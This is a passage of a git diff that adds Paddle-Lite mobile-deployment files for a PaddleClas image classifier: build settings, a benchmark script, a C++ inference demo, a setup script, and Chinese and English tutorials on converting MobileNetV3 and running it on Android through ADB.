+THIRD_PARTY_DIR=${LITE_ROOT}/third_party + +OPENCV_VERSION=opencv4.1.0 + +ifeq (${ARM_ABI}, arm8) + ARM_PATH=arm64-v8a +endif +ifeq (${ARM_ABI}, arm7) + ARM_PATH=armeabi-v7a +endif + +OPENCV_LIBS = ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/libs/libopencv_imgcodecs.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/libs/libopencv_imgproc.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/libs/libopencv_core.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/libtegra_hal.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibjpeg-turbo.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibwebp.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibpng.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibjasper.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/liblibtiff.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/libIlmImf.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/libtbb.a \ + ${THIRD_PARTY_DIR}/${OPENCV_VERSION}/${ARM_PATH}/3rdparty/libs/libcpufeatures.a + +OPENCV_INCLUDE = -I../../../third_party/${OPENCV_VERSION}/${ARM_PATH}/include + +CXX_INCLUDES = $(INCLUDES) ${OPENCV_INCLUDE} -I$(LITE_ROOT)/cxx/include + +CXX_LIBS = ${OPENCV_LIBS} -L$(LITE_ROOT)/cxx/lib/ -lpaddle_light_api_shared $(SYSTEM_LIBS) + +############################################################### +# How to use one of static libaray: # +# `libpaddle_api_full_bundled.a` # +# `libpaddle_api_light_bundled.a` # +############################################################### +# Note: default use lite's shared library. # +############################################################### +# 1. Comment above line using `libpaddle_light_api_shared.so` +# 2. 
Uncomment the line below using
push $MODELS_DIR $ANDROID_DIR + +# Run benchmark +adb shell "echo 'PaddleLite Benchmark' > $ANDROID_DIR/$RESULT_FILENAME" +for threads in ${NUM_THREADS_LIST[@]}; do + adb shell "echo Threads=$threads Warmup=$WARMUP Repeats=$REPEATS >> $ANDROID_DIR/$RESULT_FILENAME" + for model_name in ${MODELS_LIST[@]}; do + echo "Model=$model_name Threads=$threads" + if [ "$IS_RUN_MODEL_OPTIMIZE" = true ]; + then + adb shell "$ANDROID_DIR/benchmark_bin \ + --model_dir=$ANDROID_DIR/${MODELS_DIR}/$model_name \ + --model_filename=model \ + --param_filename=params \ + --warmup=$WARMUP \ + --repeats=$REPEATS \ + --threads=$threads \ + --result_filename=$ANDROID_DIR/$RESULT_FILENAME" + else + adb shell "$ANDROID_DIR/benchmark_bin \ + --optimized_model_path=$ANDROID_DIR/${MODELS_DIR}/$model_name \ + --warmup=$WARMUP \ + --repeats=$REPEATS \ + --threads=$threads \ + --result_filename=$ANDROID_DIR/$RESULT_FILENAME" + fi + done + adb shell "echo >> $ANDROID_DIR/$RESULT_FILENAME" +done + +# Adb pull benchmark result, show result +adb pull $ANDROID_DIR/$RESULT_FILENAME . +echo "\n--------------------------------------" +cat $RESULT_FILENAME +echo "--------------------------------------" diff --git a/Smart_container/PaddleClas/deploy/lite/config.txt b/Smart_container/PaddleClas/deploy/lite/config.txt new file mode 100644 index 0000000..08cee3d --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/config.txt @@ -0,0 +1,6 @@ +clas_model_file ./MobileNetV3_large_x1_0.nb +label_path ./imagenet1k_label_list.txt +resize_short_size 256 +crop_size 224 +visualize 0 +enable_benchmark 0 diff --git a/Smart_container/PaddleClas/deploy/lite/image_classfication.cpp b/Smart_container/PaddleClas/deploy/lite/image_classfication.cpp new file mode 100644 index 0000000..535f3c8 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/image_classfication.cpp @@ -0,0 +1,344 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. 
+// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include "paddle_api.h" // NOLINT +#include +#include +#include +#include +#include +#include +#include +#include + +using namespace paddle::lite_api; // NOLINT +using namespace std; + +struct RESULT { + std::string class_name; + int class_id; + float score; +}; + +std::vector PostProcess(const float *output_data, int output_size, + const std::vector &word_labels, + cv::Mat &output_image) { + const int TOPK = 5; + int max_indices[TOPK]; + double max_scores[TOPK]; + for (int i = 0; i < TOPK; i++) { + max_indices[i] = 0; + max_scores[i] = 0; + } + for (int i = 0; i < output_size; i++) { + float score = output_data[i]; + int index = i; + for (int j = 0; j < TOPK; j++) { + if (score > max_scores[j]) { + index += max_indices[j]; + max_indices[j] = index - max_indices[j]; + index -= max_indices[j]; + score += max_scores[j]; + max_scores[j] = score - max_scores[j]; + score -= max_scores[j]; + } + } + } + + std::vector results(TOPK); + for (int i = 0; i < results.size(); i++) { + results[i].class_name = "Unknown"; + if (max_indices[i] >= 0 && max_indices[i] < word_labels.size()) { + results[i].class_name = word_labels[max_indices[i]]; + } + results[i].score = max_scores[i]; + results[i].class_id = max_indices[i]; + cv::putText(output_image, + "Top" + std::to_string(i + 1) + "." 
+ results[i].class_name + + ":" + std::to_string(results[i].score), + cv::Point2d(5, i * 18 + 20), cv::FONT_HERSHEY_PLAIN, 1, + cv::Scalar(51, 255, 255)); + } + return results; +} + +// fill tensor with mean and scale and trans layout: nhwc -> nchw, neon speed up +void NeonMeanScale(const float *din, float *dout, int size, + const std::vector mean, + const std::vector scale) { + if (mean.size() != 3 || scale.size() != 3) { + std::cerr << "[ERROR] mean or scale size must equal to 3\n"; + exit(1); + } + float32x4_t vmean0 = vdupq_n_f32(mean[0]); + float32x4_t vmean1 = vdupq_n_f32(mean[1]); + float32x4_t vmean2 = vdupq_n_f32(mean[2]); + float32x4_t vscale0 = vdupq_n_f32(scale[0]); + float32x4_t vscale1 = vdupq_n_f32(scale[1]); + float32x4_t vscale2 = vdupq_n_f32(scale[2]); + + float *dout_c0 = dout; + float *dout_c1 = dout + size; + float *dout_c2 = dout + size * 2; + + int i = 0; + for (; i < size - 3; i += 4) { + float32x4x3_t vin3 = vld3q_f32(din); + float32x4_t vsub0 = vsubq_f32(vin3.val[0], vmean0); + float32x4_t vsub1 = vsubq_f32(vin3.val[1], vmean1); + float32x4_t vsub2 = vsubq_f32(vin3.val[2], vmean2); + float32x4_t vs0 = vmulq_f32(vsub0, vscale0); + float32x4_t vs1 = vmulq_f32(vsub1, vscale1); + float32x4_t vs2 = vmulq_f32(vsub2, vscale2); + vst1q_f32(dout_c0, vs0); + vst1q_f32(dout_c1, vs1); + vst1q_f32(dout_c2, vs2); + + din += 12; + dout_c0 += 4; + dout_c1 += 4; + dout_c2 += 4; + } + for (; i < size; i++) { + *(dout_c0++) = (*(din++) - mean[0]) * scale[0]; + *(dout_c1++) = (*(din++) - mean[1]) * scale[1]; + *(dout_c2++) = (*(din++) - mean[2]) * scale[2]; + } +} + +cv::Mat ResizeImage(const cv::Mat &img, const int &resize_short_size) { + int w = img.cols; + int h = img.rows; + + cv::Mat resize_img; + + float ratio = 1.f; + if (h < w) { + ratio = float(resize_short_size) / float(h); + } else { + ratio = float(resize_short_size) / float(w); + } + int resize_h = round(float(h) * ratio); + int resize_w = round(float(w) * ratio); + + cv::resize(img, resize_img, 
cv::Size(resize_w, resize_h)); + return resize_img; +} + +cv::Mat CenterCropImg(const cv::Mat &img, const int &crop_size) { + int resize_w = img.cols; + int resize_h = img.rows; + int w_start = int((resize_w - crop_size) / 2); + int h_start = int((resize_h - crop_size) / 2); + cv::Rect rect(w_start, h_start, crop_size, crop_size); + cv::Mat crop_img = img(rect); + return crop_img; +} + +std::vector +RunClasModel(std::shared_ptr predictor, const cv::Mat &img, + const std::map &config, + const std::vector &word_labels, double &cost_time) { + // Read img + int resize_short_size = stoi(config.at("resize_short_size")); + int crop_size = stoi(config.at("crop_size")); + int visualize = stoi(config.at("visualize")); + + cv::Mat resize_image = ResizeImage(img, resize_short_size); + + cv::Mat crop_image = CenterCropImg(resize_image, crop_size); + + cv::Mat img_fp; + double e = 1.0 / 255.0; + crop_image.convertTo(img_fp, CV_32FC3, e); + + // Prepare input data from image + std::unique_ptr input_tensor(std::move(predictor->GetInput(0))); + input_tensor->Resize({1, 3, img_fp.rows, img_fp.cols}); + auto *data0 = input_tensor->mutable_data(); + + std::vector mean = {0.485f, 0.456f, 0.406f}; + std::vector scale = {1 / 0.229f, 1 / 0.224f, 1 / 0.225f}; + const float *dimg = reinterpret_cast(img_fp.data); + NeonMeanScale(dimg, data0, img_fp.rows * img_fp.cols, mean, scale); + + auto start = std::chrono::system_clock::now(); + // Run predictor + predictor->Run(); + + // Get output and post process + std::unique_ptr output_tensor( + std::move(predictor->GetOutput(0))); + auto *output_data = output_tensor->data(); + auto end = std::chrono::system_clock::now(); + auto duration = + std::chrono::duration_cast(end - start); + cost_time = double(duration.count()) * + std::chrono::microseconds::period::num / + std::chrono::microseconds::period::den; + + int output_size = 1; + for (auto dim : output_tensor->shape()) { + output_size *= dim; + } + + cv::Mat output_image; + auto results = + 
PostProcess(output_data, output_size, word_labels, output_image); + + if (visualize) { + std::string output_image_path = "./clas_result.png"; + cv::imwrite(output_image_path, output_image); + std::cout << "save output image into " << output_image_path << std::endl; + } + + return results; +} + +std::shared_ptr LoadModel(std::string model_file) { + MobileConfig config; + config.set_model_from_file(model_file); + + std::shared_ptr predictor = + CreatePaddlePredictor(config); + return predictor; +} + +std::vector split(const std::string &str, + const std::string &delim) { + std::vector res; + if ("" == str) + return res; + char *strs = new char[str.length() + 1]; + std::strcpy(strs, str.c_str()); + + char *d = new char[delim.length() + 1]; + std::strcpy(d, delim.c_str()); + + char *p = std::strtok(strs, d); + while (p) { + string s = p; + res.push_back(s); + p = std::strtok(NULL, d); + } + + return res; +} + +std::vector ReadDict(std::string path) { + std::ifstream in(path); + std::string filename; + std::string line; + std::vector m_vec; + if (in) { + while (getline(in, line)) { + m_vec.push_back(line); + } + } else { + std::cout << "no such file" << std::endl; + } + return m_vec; +} + +std::map LoadConfigTxt(std::string config_path) { + auto config = ReadDict(config_path); + + std::map dict; + for (int i = 0; i < config.size(); i++) { + std::vector res = split(config[i], " "); + dict[res[0]] = res[1]; + } + return dict; +} + +void PrintConfig(const std::map &config) { + std::cout << "=======PaddleClas lite demo config======" << std::endl; + for (auto iter = config.begin(); iter != config.end(); iter++) { + std::cout << iter->first << " : " << iter->second << std::endl; + } + std::cout << "=======End of PaddleClas lite demo config======" << std::endl; +} + +std::vector LoadLabels(const std::string &path) { + std::ifstream file; + std::vector labels; + file.open(path); + while (file) { + std::string line; + std::getline(file, line); + std::string::size_type pos = 
line.find(" "); + if (pos != std::string::npos) { + line = line.substr(pos); + } + labels.push_back(line); + } + file.clear(); + file.close(); + return labels; +} + +int main(int argc, char **argv) { + if (argc < 3) { + std::cerr << "[ERROR] usage: " << argv[0] << " config_path img_path\n"; + exit(1); + } + + std::string config_path = argv[1]; + std::string img_path = argv[2]; + + // load config + auto config = LoadConfigTxt(config_path); + PrintConfig(config); + + double elapsed_time = 0.0; + int warmup_iter = 10; + + bool enable_benchmark = bool(stoi(config.at("enable_benchmark"))); + int total_cnt = enable_benchmark ? 1000 : 1; + + std::string clas_model_file = config.at("clas_model_file"); + std::string label_path = config.at("label_path"); + + // Load Labels + std::vector word_labels = LoadLabels(label_path); + + auto clas_predictor = LoadModel(clas_model_file); + for (int j = 0; j < total_cnt; ++j) { + cv::Mat srcimg = cv::imread(img_path, cv::IMREAD_COLOR); + cv::cvtColor(srcimg, srcimg, cv::COLOR_BGR2RGB); + + double run_time = 0; + std::vector results = + RunClasModel(clas_predictor, srcimg, config, word_labels, run_time); + + std::cout << "===clas result for image: " << img_path << "===" << std::endl; + for (int i = 0; i < results.size(); i++) { + std::cout << "\t" + << "Top-" << i + 1 << ", class_id: " << results[i].class_id + << ", class_name: " << results[i].class_name + << ", score: " << results[i].score << std::endl; + } + if (j >= warmup_iter) { + elapsed_time += run_time; + std::cout << "Current image path: " << img_path << std::endl; + std::cout << "Current time cost: " << run_time << " s, " + << "average time cost in all: " + << elapsed_time / (j + 1 - warmup_iter) << " s." << std::endl; + } else { + std::cout << "Current time cost: " << run_time << " s." 
<< std::endl; + } + } + + return 0; +} diff --git a/Smart_container/PaddleClas/deploy/lite/imgs/lite_demo_result.png b/Smart_container/PaddleClas/deploy/lite/imgs/lite_demo_result.png new file mode 100644 index 0000000..b778f15 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/lite/imgs/lite_demo_result.png differ diff --git a/Smart_container/PaddleClas/deploy/lite/imgs/tabby_cat.jpg b/Smart_container/PaddleClas/deploy/lite/imgs/tabby_cat.jpg new file mode 100644 index 0000000..6eb5b71 Binary files /dev/null and b/Smart_container/PaddleClas/deploy/lite/imgs/tabby_cat.jpg differ diff --git a/Smart_container/PaddleClas/deploy/lite/prepare.sh b/Smart_container/PaddleClas/deploy/lite/prepare.sh new file mode 100644 index 0000000..ed1f13a --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/prepare.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +if [ $# != 1 ] ; then +echo "USAGE: $0 your_inference_lite_lib_path" +exit 1; +fi + +mkdir -p $1/demo/cxx/clas/debug/ +cp ../../ppcls/utils/imagenet1k_label_list.txt $1/demo/cxx/clas/debug/ +cp -r ./* $1/demo/cxx/clas/ +cp ./config.txt $1/demo/cxx/clas/debug/ +cp ./imgs/tabby_cat.jpg $1/demo/cxx/clas/debug/ + +echo "Prepare Done" diff --git a/Smart_container/PaddleClas/deploy/lite/readme.md b/Smart_container/PaddleClas/deploy/lite/readme.md new file mode 100644 index 0000000..176e62c --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/readme.md @@ -0,0 +1,265 @@ +# 端侧部署 + +本教程将介绍基于[Paddle Lite](https://github.com/PaddlePaddle/Paddle-Lite) 在移动端部署PaddleClas分类模型的详细步骤。 + +Paddle Lite是飞桨轻量化推理引擎,为手机、IOT端提供高效推理能力,并广泛整合跨平台硬件,为端侧部署及应用落地问题提供轻量化的部署方案。如果希望直接测试速度,可以参考[Paddle-Lite移动端benchmark测试教程](../../docs/zh_CN/extension/paddle_mobile_inference.md)。 + + +## 1. 准备环境 + +### 运行准备 +- 电脑(编译Paddle Lite) +- 安卓手机(armv7或armv8) + +### 1.1 准备交叉编译环境 +交叉编译环境用于编译 Paddle Lite 和 PaddleClas 的C++ demo。 +支持多种开发环境,不同开发环境的编译流程请参考对应文档。 + +1. [Docker](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#docker) +2. 
[Linux](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#linux) +3. [MAC OS](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#mac-os) + +### 1.2 准备预测库 + +预测库有两种获取方式: +1. [建议]直接下载,预测库下载链接如下: + |平台|预测库下载链接| + |-|-| + |Android|[arm7](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/Android/gcc/inference_lite_lib.android.armv7.gcc.c++_static.with_extra.with_cv.tar.gz) / [arm8](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/Android/gcc/inference_lite_lib.android.armv8.gcc.c++_static.with_extra.with_cv.tar.gz)| + |iOS|[arm7](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/iOS/inference_lite_lib.ios.armv7.with_cv.with_extra.tiny_publish.tar.gz) / [arm8](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/iOS/inference_lite_lib.ios.armv8.with_cv.with_extra.tiny_publish.tar.gz)| + + **注**: + 1. 如果是从 Paddle-Lite [官方文档](https://paddle-lite.readthedocs.io/zh/latest/quick_start/release_lib.html#android-toolchain-gcc)下载的预测库, + 注意选择`with_extra=ON,with_cv=ON`的下载链接。 + 2. 如果使用量化的模型部署在端侧,建议使用Paddle-Lite develop分支编译预测库。 + +2. 
编译Paddle-Lite得到预测库,Paddle-Lite的编译方式如下: +```shell +git clone https://github.com/PaddlePaddle/Paddle-Lite.git +cd Paddle-Lite +# 如果使用编译方式,建议使用develop分支编译预测库 +git checkout develop +./lite/tools/build_android.sh --arch=armv8 --with_cv=ON --with_extra=ON +``` + +**注意**:编译Paddle-Lite获得预测库时,需要打开`--with_cv=ON --with_extra=ON`两个选项,`--arch`表示`arm`版本,这里指定为armv8,更多编译命令介绍请参考[链接](https://paddle-lite.readthedocs.io/zh/latest/user_guides/Compile/Android.html#id2)。 + +直接下载预测库并解压后,可以得到`inference_lite_lib.android.armv8/`文件夹,通过编译Paddle-Lite得到的预测库位于`Paddle-Lite/build.lite.android.armv8.gcc/inference_lite_lib.android.armv8/`文件夹下。 +预测库的文件目录如下: + +``` +inference_lite_lib.android.armv8/ +|-- cxx C++ 预测库和头文件 +| |-- include C++ 头文件 +| | |-- paddle_api.h +| | |-- paddle_image_preprocess.h +| | |-- paddle_lite_factory_helper.h +| | |-- paddle_place.h +| | |-- paddle_use_kernels.h +| | |-- paddle_use_ops.h +| | `-- paddle_use_passes.h +| `-- lib C++预测库 +| |-- libpaddle_api_light_bundled.a C++静态库 +| `-- libpaddle_light_api_shared.so C++动态库 +|-- java Java预测库 +| |-- jar +| | `-- PaddlePredictor.jar +| |-- so +| | `-- libpaddle_lite_jni.so +| `-- src +|-- demo C++和Java示例代码 +| |-- cxx C++ 预测库demo +| `-- java Java 预测库demo +``` + +## 2 开始运行 + +### 2.1 模型优化 + +Paddle-Lite 提供了多种策略来自动优化原始的模型,其中包括量化、子图融合、混合调度、Kernel优选等方法,使用Paddle-Lite的`opt`工具可以自动对inference模型进行优化,目前支持两种优化方式,优化后的模型更轻量,模型运行速度更快。 + +**注意**:如果已经准备好了 `.nb` 结尾的模型文件,可以跳过此步骤。 + +#### 2.1.1 [建议]pip安装paddlelite并进行转换 + +Python下安装 `paddlelite`,目前最高支持`Python3.7`。 +**注意**:`paddlelite`whl包版本必须和预测库版本对应。 + +```shell +pip install paddlelite==2.8 +``` + +之后使用`paddle_lite_opt`工具可以进行inference模型的转换。`paddle_lite_opt`的部分参数如下 + +|选项|说明| +|-|-| +|--model_dir|待优化的PaddlePaddle模型(非combined形式)的路径| +|--model_file|待优化的PaddlePaddle模型(combined形式)的网络结构文件路径| +|--param_file|待优化的PaddlePaddle模型(combined形式)的权重文件路径| +|--optimize_out_type|输出模型类型,目前支持两种类型:protobuf和naive_buffer,其中naive_buffer是一种更轻量级的序列化/反序列化实现。若您需要在mobile端执行模型预测,请将此选项设置为naive_buffer。默认为protobuf| 
+|--optimize_out|优化模型的输出路径| +|--valid_targets|指定模型可执行的backend,默认为arm。目前可支持x86、arm、opencl、npu、xpu,可以同时指定多个backend(以空格分隔),Model Optimize Tool将会自动选择最佳方式。如果需要支持华为NPU(Kirin 810/990 Soc搭载的达芬奇架构NPU),应当设置为npu, arm| +|--record_tailoring_info|当使用 根据模型裁剪库文件 功能时,则设置该选项为true,以记录优化后模型含有的kernel和OP信息,默认为false| + +`--model_file`表示inference模型的model文件地址,`--param_file`表示inference模型的param文件地址;`optimize_out`用于指定输出文件的名称(不需要添加`.nb`的后缀)。直接在命令行中运行`paddle_lite_opt`,也可以查看所有参数及其说明。 + + +#### 2.1.2 源码编译Paddle-Lite生成opt工具 + +模型优化需要Paddle-Lite的`opt`可执行文件,可以通过编译Paddle-Lite源码获得,编译步骤如下: +```shell +# 如果准备环境时已经clone了Paddle-Lite,则不用重新clone Paddle-Lite +git clone https://github.com/PaddlePaddle/Paddle-Lite.git +cd Paddle-Lite +git checkout develop +# 启动编译 +./lite/tools/build.sh build_optimize_tool +``` + +编译完成后,`opt`文件位于`build.opt/lite/api/`下,可通过如下方式查看`opt`的运行选项和使用方式; +```shell +cd build.opt/lite/api/ +./opt +``` + +`opt`的使用方式与参数与上面的`paddle_lite_opt`完全一致。 + + + +#### 2.1.3 转换示例 + +下面以PaddleClas的 `MobileNetV3_large_x1_0` 模型为例,介绍使用`paddle_lite_opt`完成预训练模型到inference模型,再到Paddle-Lite优化模型的转换。 + +```shell +# 进入PaddleClas根目录 +cd PaddleClas_root_path + +# 下载并解压inference模型 +wget https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/inference/MobileNetV3_large_x1_0_infer.tar +tar -xf MobileNetV3_large_x1_0_infer.tar + +# 将inference模型转化为Paddle-Lite优化模型 +paddle_lite_opt --model_file=./MobileNetV3_large_x1_0_infer/inference.pdmodel --param_file=./MobileNetV3_large_x1_0_infer/inference.pdiparams --optimize_out=./MobileNetV3_large_x1_0 +``` + +最终在当前文件夹下生成`MobileNetV3_large_x1_0.nb`的文件。 + +**注意**:`--optimize_out` 参数为优化后模型的保存路径,无需加后缀`.nb`;`--model_file` 参数为模型结构信息文件的路径,`--param_file` 参数为模型权重信息文件的路径,请注意文件名。 + + +### 2.2 与手机联调 + +首先需要进行一些准备工作。 +1. 准备一台arm8的安卓手机,如果编译的预测库和opt文件是armv7,则需要arm7的手机,并修改Makefile中`ARM_ABI = arm7`。 +2. 电脑上安装ADB工具,用于调试。 ADB安装方式如下: + + 3.1. MAC电脑安装ADB: + + ```shell + brew cask install android-platform-tools + ``` + 3.2. 
Linux安装ADB + ```shell + sudo apt update + sudo apt install -y wget adb + ``` + 3.3. Window安装ADB + + win上安装需要去谷歌的安卓平台下载ADB软件包进行安装:[链接](https://developer.android.com/studio) + +4. 手机连接电脑后,开启手机`USB调试`选项,选择`文件传输`模式,在电脑终端中输入: + +```shell +adb devices +``` +如果有device输出,则表示安装成功,如下所示: +``` +List of devices attached +744be294 device +``` + +5. 准备优化后的模型、预测库文件、测试图像和类别映射文件。 + +```shell +cd PaddleClas_root_path +cd deploy/lite/ + +# 运行prepare.sh +# prepare.sh 会将预测库文件、测试图像和使用的字典文件放置在预测库中的demo/cxx/clas文件夹下 +sh prepare.sh /{lite prediction library path}/inference_lite_lib.android.armv8 + +# 进入lite demo的工作目录 +cd /{lite prediction library path}/inference_lite_lib.android.armv8/ +cd demo/cxx/clas/ + +# 将C++预测动态库so文件复制到debug文件夹中 +cp ../../../cxx/lib/libpaddle_light_api_shared.so ./debug/ +``` + +`prepare.sh` 以 `PaddleClas/deploy/lite/imgs/tabby_cat.jpg` 作为测试图像,将测试图像复制到`demo/cxx/clas/debug/` 文件夹下。 +将 `paddle_lite_opt` 工具优化后的模型文件放置到 `/{lite prediction library path}/inference_lite_lib.android.armv8/demo/cxx/clas/debug/` 文件夹下。本例中,使用[2.1.3](#2.1.3)生成的 `MobileNetV3_large_x1_0.nb` 模型文件。 + +执行完成后,clas文件夹下将有如下文件格式: + +``` +demo/cxx/clas/ +|-- debug/ +| |--MobileNetV3_large_x1_0.nb 优化后的分类器模型文件 +| |--tabby_cat.jpg 待测试图像 +| |--imagenet1k_label_list.txt 类别映射文件 +| |--libpaddle_light_api_shared.so C++预测库文件 +| |--config.txt 分类预测超参数配置 +|-- config.txt 分类预测超参数配置 +|-- image_classfication.cpp 图像分类代码文件 +|-- Makefile 编译文件 +``` + +#### 注意: +* 上述文件中,`imagenet1k_label_list.txt` 是ImageNet1k数据集的类别映射文件,如果使用自定义的类别,需要更换该类别映射文件。 + +* `config.txt` 包含了分类器的超参数,如下: + +```shell +clas_model_file ./MobileNetV3_large_x1_0.nb # 模型文件地址 +label_path ./imagenet1k_label_list.txt # 类别映射文本文件 +resize_short_size 256 # resize之后的短边边长 +crop_size 224 # 裁剪后用于预测的边长 +visualize 0 # 是否进行可视化,如果选择的话,会在当前文件夹下生成名为clas_result.png的图像文件。 +``` + +5. 
启动调试,上述步骤完成后就可以使用ADB将文件夹 `debug/` push到手机上运行,步骤如下: + +```shell +# 执行编译,得到可执行文件clas_system +make -j + +# 将编译得到的可执行文件移动到debug文件夹中 +mv clas_system ./debug/ + +# 将上述debug文件夹push到手机上 +adb push debug /data/local/tmp/ + +adb shell +cd /data/local/tmp/debug +export LD_LIBRARY_PATH=/data/local/tmp/debug:$LD_LIBRARY_PATH + +# clas_system可执行文件的使用方式为: +# ./clas_system 配置文件路径 测试图像路径 +./clas_system ./config.txt ./tabby_cat.jpg +``` + +如果对代码做了修改,则需要重新编译并push到手机上。 + +运行效果如下: + +
+ +
+ + +## FAQ +Q1:如果想更换模型怎么办,需要重新按照流程走一遍吗? +A1:如果已经走通了上述步骤,更换模型只需要替换 `.nb` 模型文件即可,同时要注意修改下配置文件中的 `.nb` 文件路径以及类别映射文件(如有必要)。 + +Q2:换一个图测试怎么做? +A2:替换 debug 下的测试图像为你想要测试的图像,使用 ADB 再次 push 到手机上即可。 diff --git a/Smart_container/PaddleClas/deploy/lite/readme_en.md b/Smart_container/PaddleClas/deploy/lite/readme_en.md new file mode 100644 index 0000000..1027c78 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/lite/readme_en.md @@ -0,0 +1,257 @@ + +# Tutorial of PaddleClas Mobile Deployment + +This tutorial will introduce how to use [Paddle-Lite](https://github.com/PaddlePaddle/Paddle-Lite) to deploy PaddleClas models on mobile phones. + +Paddle-Lite is a lightweight inference engine for PaddlePaddle. It provides efficient inference capabilities for mobile phones and IoTs, and extensively integrates cross-platform hardware to provide lightweight deployment solutions for mobile-side deployment issues. + +If you only want to test speed, please refer to [The tutorial of Paddle-Lite mobile-side benchmark test](../../docs/zh_CN/extension/paddle_mobile_inference.md). + +## 1. Preparation + +- Computer (for compiling Paddle-Lite) +- Mobile phone (arm7 or arm8) + +## 2. Build Paddle-Lite library + +The cross-compilation environment is used to compile the C++ demos of Paddle-Lite and PaddleClas. + +For the detailed compilation directions of different development environments, please refer to the corresponding documents. + +1. [Docker](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#docker) +2. [Linux](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#linux) +3. [macOS](https://paddle-lite.readthedocs.io/zh/latest/source_compile/compile_env.html#mac-os) + +## 3. 
Download inference library for Android or iOS + +|Platform|Inference Library Download Link| +|-|-| +|Android|[arm7](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/Android/gcc/inference_lite_lib.android.armv7.gcc.c++_static.with_extra.with_cv.tar.gz) / [arm8](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/Android/gcc/inference_lite_lib.android.armv8.gcc.c++_static.with_extra.with_cv.tar.gz)| +|iOS|[arm7](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/iOS/inference_lite_lib.ios.armv7.with_cv.with_extra.tiny_publish.tar.gz) / [arm8](https://paddlelite-data.bj.bcebos.com/Release/2.8-rc/iOS/inference_lite_lib.ios.armv8.with_cv.with_extra.tiny_publish.tar.gz)| + +**NOTE**: + +1. If you download the inference library from [Paddle-Lite official document](https://paddle-lite.readthedocs.io/zh/latest/quick_start/release_lib.html#android-toolchain-gcc), please choose `with_extra=ON` , `with_cv=ON` . + +2. It is recommended to build inference library using [Paddle-Lite](https://github.com/PaddlePaddle/Paddle-Lite) develop branch if you want to deploy the [quantitative](https://github.com/PaddlePaddle/PaddleOCR/blob/develop/deploy/slim/quantization/README_en.md) model to mobile phones. Please refer to the [link](https://paddle-lite.readthedocs.io/zh/latest/user_guides/Compile/Android.html#id2) for more detailed information about compiling. 
+ + +The structure of the inference library is as follows: + +``` +inference_lite_lib.android.armv8/ +|-- cxx C++ inference library and header files +| |-- include C++ header files +| | |-- paddle_api.h +| | |-- paddle_image_preprocess.h +| | |-- paddle_lite_factory_helper.h +| | |-- paddle_place.h +| | |-- paddle_use_kernels.h +| | |-- paddle_use_ops.h +| | `-- paddle_use_passes.h +| `-- lib C++ inference library +| |-- libpaddle_api_light_bundled.a C++ static library +| `-- libpaddle_light_api_shared.so C++ dynamic library +|-- java Java inference library +| |-- jar +| | `-- PaddlePredictor.jar +| |-- so +| | `-- libpaddle_lite_jni.so +| `-- src +|-- demo C++ and java demos +| |-- cxx C++ demos +| `-- java Java demos +``` + + + +## 4. Inference Model Optimization + +Paddle-Lite provides a variety of strategies to automatically optimize the original training model, including quantization, sub-graph fusion, hybrid scheduling, Kernel optimization and so on. In order to make the optimization process more convenient and easy to use, Paddle-Lite provides `opt` tool to automatically complete the optimization steps and output a lightweight, optimal executable model. + +**NOTE**: If you have already got the `.nb` file, you can skip this step. + + + +### 4.1 [RECOMMEND] Use `pip` to install Paddle-Lite and optimize model + +* Use pip to install Paddle-Lite. The following command uses `pip3.7` . + +```shell +pip install paddlelite==2.8 +``` +**Note**:The version of `paddlelite`'s wheel must match that of inference lib. + +* Use `paddle_lite_opt` to optimize inference model, the parameters of `paddle_lite_opt` are as follows: + +| Parameters | Explanation | +| ----------------------- | ------------------------------------------------------------ | +| --model_dir | Path to the PaddlePaddle model (no-combined) file to be optimized. | +| --model_file | Path to the net structure file of PaddlePaddle model (combined) to be optimized. 
